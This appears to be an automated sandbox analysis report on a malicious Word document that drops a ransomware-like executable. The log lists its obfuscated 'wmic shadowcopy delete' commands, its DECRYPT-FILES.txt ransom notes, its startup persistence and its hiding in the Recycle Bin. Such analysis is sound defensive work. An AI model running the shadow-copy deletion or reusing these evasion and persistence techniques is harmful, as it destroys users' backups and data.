Creates files inside the program directoryShow sources
Source: C:\Windows\Temp\wupd12.14.tmpFile created: C:\Program Files\5e4c085c3c4e0000.tmpJump to behavior
Creates files inside the user directoryShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$Verdi.docJump to behavior
Creates temporary filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user~1\AppData\Local\Temp\CVRB699.tmpJump to behavior
Document contains summary information with irregular field valuesShow sources
Source: Verdi.docOLE document summary: title field not present or empty
Source: Verdi.docOLE document summary: author field not present or empty
Source: Verdi.docOLE document summary: edited time not present or 0
Source: Verdi.docOLE document summary: title field not present or empty
Source: Verdi.docOLE document summary: author field not present or empty
Source: Verdi.docOLE document summary: edited time not present or 0
Reads ini filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Windows\Temp\wupd12.14.tmpKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Sample is known by AntivirusShow sources
Source: Verdi.docVirustotal: Detection: 50%
Spawns processesShow sources
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknownProcess created: C:\Windows\Temp\wupd12.14.tmp C:\Windows\Temp\wupd12.14.tmp
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknownProcess created: C:\Windows\System32\wbem\WMIC.exe 'C:\bjy\..\Windows\cib\jduxt\..\..\system32\sy\oaljs\..\..\wbem\mdbkx\..\wmic.exe' shadowcopy delete
Source: unknownProcess created: C:\Windows\System32\notepad.exe 'C:\Windows\system32\NOTEPAD.EXE' C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DECRYPT-FILES.txt
Source: unknownProcess created: C:\Windows\System32\wbem\WMIC.exe 'C:\xchrq\..\Windows\uraci\..\system32\vtm\nxe\jormg\..\..\..\wbem\denq\..\wmic.exe' shadowcopy delete
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\Temp\wupd12.14.tmp C:\Windows\Temp\wupd12.14.tmpJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpProcess created: C:\Windows\System32\wbem\WMIC.exe 'C:\bjy\..\Windows\cib\jduxt\..\..\system32\sy\oaljs\..\..\wbem\mdbkx\..\wmic.exe' shadowcopy deleteJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpProcess created: C:\Windows\System32\wbem\WMIC.exe 'C:\xchrq\..\Windows\uraci\..\system32\vtm\nxe\jormg\..\..\..\wbem\denq\..\wmic.exe' shadowcopy deleteJump to behavior
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Windows\Temp\wupd12.14.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
Writes ini filesShow sources
Source: C:\Windows\Temp\wupd12.14.tmpFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\compatibility.iniJump to behavior
Executable creates window controls seldom found in malwareShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWindow found: window name: SysTabControl32Jump to behavior
Uses Rich Edit ControlsShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\system32\MSFTEDIT.DLLJump to behavior
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Document is a ZIP file with path names indicative of goodwareShow sources
Source: Verdi.docInitial sample: OLE zip file path = word/media/image3.wmf
Source: Verdi.docInitial sample: OLE zip file path = word/media/image4.jpeg
Checks if Microsoft Office is installedShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
Creates a directory in C:\Program FilesShow sources
Source: C:\Windows\Temp\wupd12.14.tmpDirectory created: C:\Program Files\5e4c085c3c4e0000.tmpJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpDirectory created: C:\Program Files\DECRYPT-FILES.txtJump to behavior
Uses new MSVCR DllsShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dllJump to behavior
Binary contains paths to debug symbolsShow sources
Source: Binary string: scrrun.pdb source: WINWORD.EXE, 00000000.00000002.336869351.072F0000.00000002.00000001.sdmp
Source: Binary string: InkEd.pdb source: WINWORD.EXE, 00000000.00000002.329912926.049B0000.00000002.00000001.sdmp
Source: Binary string: D:\office\Target\word\x86\ship\0\msword.PDB source: WINWORD.EXE, 00000000.00000002.328656328.03DE0000.00000002.00000001.sdmp
Document has a 'vbamacros' value indicative of goodwareShow sources
Source: Verdi.docInitial sample: OLE indicators vbamacros = False

Data Obfuscation:

barindex
Detected unpacking (changes PE section rights)Show sources
Source: C:\Windows\Temp\wupd12.14.tmpUnpacked PE file: 5.2.wupd12.14.tmp.400000.4.unpack .text:ER;.data:W;.rsrc:W;Unknown_Section3:W;Unknown_Section4:W; vs .text:ER;.rdata:R;.data:W;
Detected unpacking (overwrites its own PE header)Show sources
Source: C:\Windows\Temp\wupd12.14.tmpUnpacked PE file: 5.2.wupd12.14.tmp.400000.4.unpack
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004320D0 push 000014CBh; retf 5_2_004320EE
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004219E0 push 004219EFh; ret 5_2_00421F8B
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004219E0 push 004219EFh; ret 5_2_0042206E
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004219E0 push 004219EFh; ret 5_2_004220B4
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004219E0 push 004219EFh; ret 5_2_00422112
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004219E0 push 004219EFh; ret 5_2_00422217
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004219E0 push 004219EFh; ret 5_2_00422243
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004219E0 push 004219EFh; ret 5_2_00422395
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004219E0 push 004219EFh; ret 5_2_00422463
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004219E0 push 004219EFh; ret 5_2_0042248C
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004219E0 push 004219EFh; ret 5_2_004224DD
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004219E0 push 004219EFh; ret 5_2_004225BD
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004219E0 push 004219EFh; ret 5_2_00422671
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004219E0 push 004219EFh; ret 5_2_0042271D
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004219E0 push 004219EFh; ret 5_2_0042288D
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004219E0 push 004219EFh; ret 5_2_00422A78
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004219E0 push 004219EFh; ret 5_2_00422AFB
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004219E0 push 004219EFh; ret 5_2_00422B2B
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004219E0 push 004219EFh; ret 5_2_00422BC1
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004219E0 push 004219EFh; ret 5_2_00422C73
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004219E0 push 004219EFh; ret 5_2_00422CE0
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004219E0 push 004219EFh; ret 5_2_00422DE3
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004219E0 push 004219EFh; ret 5_2_00422E07
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004219E0 push 004219EFh; ret 5_2_00422ED1
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004219E0 push 004219EFh; ret 5_2_00422F46
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004219E0 push 004219EFh; ret 5_2_00422FB5
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004219E0 push 0042300Dh; ret 5_2_0042336D
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004219E0 push 0042300Dh; ret 5_2_0042340C
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004219E0 push 0042300Dh; ret 5_2_0042348C
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004219E0 push 0042300Dh; ret 5_2_004234B9
Source: C:\Windows\Temp\wupd12.14.tmpCode function: 5_2_004219E0 push 0042300Dh; ret 5_2_00423503

Persistence and Installation Behavior:

barindex
Infects executable files (exe, dll, sys, html)Show sources
Source: C:\Windows\Temp\wupd12.14.tmpSystem file mapped for write: C:\Users\user\AppData\Roaming\.jre\Welcome.htmlJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpSystem file written: C:\Users\user\AppData\Roaming\.jre\Welcome.htmlJump to behavior
Drops PE filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Windows\Temp\wupd12.14.tmpJump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\GKZSIVUJ\wordupd[1].tmpJump to dropped file
Drops PE files to the windows directory (C:\Windows)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Windows\Temp\wupd12.14.tmpJump to dropped file
Searches for installed JRE in non-default directoryShow sources
Source: C:\Windows\Temp\wupd12.14.tmpFile opened: C:\Users\user\AppData\Roaming\.jre\ read data or list directory | synchronizeJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile opened: C:\Users\user\AppData\Roaming\.jre\bin\ read data or list directory | synchronizeJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile opened: C:\Users\user\AppData\Roaming\.jre\bin\client\ read data or list directory | synchronizeJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile opened: C:\Users\user\AppData\Roaming\.jre\bin\dtplugin\ read data or list directory | synchronizeJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile opened: C:\Users\user\AppData\Roaming\.jre\bin\plugin2\ read data or list directory | synchronizeJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile opened: C:\Users\user\AppData\Roaming\.jre\lib\ read data or list directory | synchronizeJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile opened: C:\Users\user\AppData\Roaming\.jre\lib\applet\ read data or list directory | synchronizeJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile opened: C:\Users\user\AppData\Roaming\.jre\lib\cmm\ read data or list directory | synchronizeJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile opened: C:\Users\user\AppData\Roaming\.jre\lib\deploy\ read data or list directory | synchronizeJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile opened: C:\Users\user\AppData\Roaming\.jre\lib\ext\ read data or list directory | synchronizeJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile opened: C:\Users\user\AppData\Roaming\.jre\lib\fonts\ read data or list directory | synchronizeJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile opened: C:\Users\user\AppData\Roaming\.jre\lib\i386\ read data or list directory | synchronizeJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile opened: C:\Users\user\AppData\Roaming\.jre\lib\images\ read data or list directory | synchronizeJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile opened: C:\Users\user\AppData\Roaming\.jre\lib\images\cursors\ read data or list directory | synchronizeJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile opened: C:\Users\user\AppData\Roaming\.jre\lib\jfr\ read data or list directory | synchronizeJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile opened: C:\Users\user\AppData\Roaming\.jre\lib\management\ read data or list directory | synchronizeJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile opened: C:\Users\user\AppData\Roaming\.jre\lib\security\ read data or list directory | synchronizeJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile opened: C:\Users\user\AppData\Roaming\.jre\lib\security\policy\ read data or list directory | synchronizeJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile opened: C:\Users\user\AppData\Roaming\.jre\lib\security\policy\limited\ read data or list directory | synchronizeJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile opened: C:\Users\user\AppData\Roaming\.jre\lib\security\policy\unlimited\ read data or list directory | synchronizeJump to behavior

Boot Survival:

barindex
Creates a start menu entry (Start Menu\Programs\Startup)Show sources
Source: C:\Windows\Temp\wupd12.14.tmpFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5e4c085c3c4e0000.tmpJump to behavior
Stores files to the Windows start menu directoryShow sources
Source: C:\Windows\Temp\wupd12.14.tmpFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\5e4c085c3c4e0000.tmpJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\DECRYPT-FILES.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\5e4c085c3c4e0000.tmpJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\DECRYPT-FILES.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\5e4c085c3c4e0000.tmpJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\DECRYPT-FILES.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\5e4c085c3c4e0000.tmpJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\DECRYPT-FILES.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\5e4c085c3c4e0000.tmpJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\DECRYPT-FILES.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\5e4c085c3c4e0000.tmpJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\DECRYPT-FILES.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: C:\Users\Default\Start Menu\5e4c085c3c4e0000.tmpJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\5e4c085c3c4e0000.tmpJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\DECRYPT-FILES.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\5e4c085c3c4e0000.tmpJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\DECRYPT-FILES.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\5e4c085c3c4e0000.tmpJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\DECRYPT-FILES.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\5e4c085c3c4e0000.tmpJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\DECRYPT-FILES.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\5e4c085c3c4e0000.tmpJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\DECRYPT-FILES.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\5e4c085c3c4e0000.tmpJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\DECRYPT-FILES.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\5e4c085c3c4e0000.tmpJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\DECRYPT-FILES.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\5e4c085c3c4e0000.tmpJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DECRYPT-FILES.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: C:\Users\user\Start Menu\5e4c085c3c4e0000.tmpJump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Creates files in the recycle bin to hide itselfShow sources
Source: C:\Windows\Temp\wupd12.14.tmpFile created: C:\$Recycle.Bin\5e4c085c3c4e0000.tmpJump to behavior
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
